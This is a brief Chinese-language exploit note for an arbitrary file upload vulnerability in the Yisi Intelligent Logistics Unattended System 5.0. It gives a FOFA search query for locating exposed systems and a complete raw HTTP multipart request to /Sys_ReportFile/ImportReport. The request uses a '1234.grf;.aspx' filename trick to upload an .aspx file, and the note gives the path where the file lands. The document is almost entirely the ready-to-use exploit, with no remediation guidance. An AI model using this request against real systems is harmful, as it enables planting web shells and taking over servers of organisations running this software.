易思智能物流无人值守系统5.0存在任意文件上传漏洞
易思智能物流无人值守系统5.0存在任意文件上传漏洞
fofa
"智能物流无人值守系统"
exp
POST /Sys_ReportFile/ImportReport?encode=717132 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 199
Content-Type: multipart/form-data; boundary=59d3d0b126080d21572c9e7a77d89931
--59d3d0b126080d21572c9e7a77d89931
Content-Disposition: form-data; name="file"; filename="1234.grf;.aspx"
Content-Type: application/octet-stream
304674859
--59d3d0b126080d21572c9e7a77d89931--
上传成功后,会返回路径 http://127.0.0.1/GRF/Custom/717132.aspx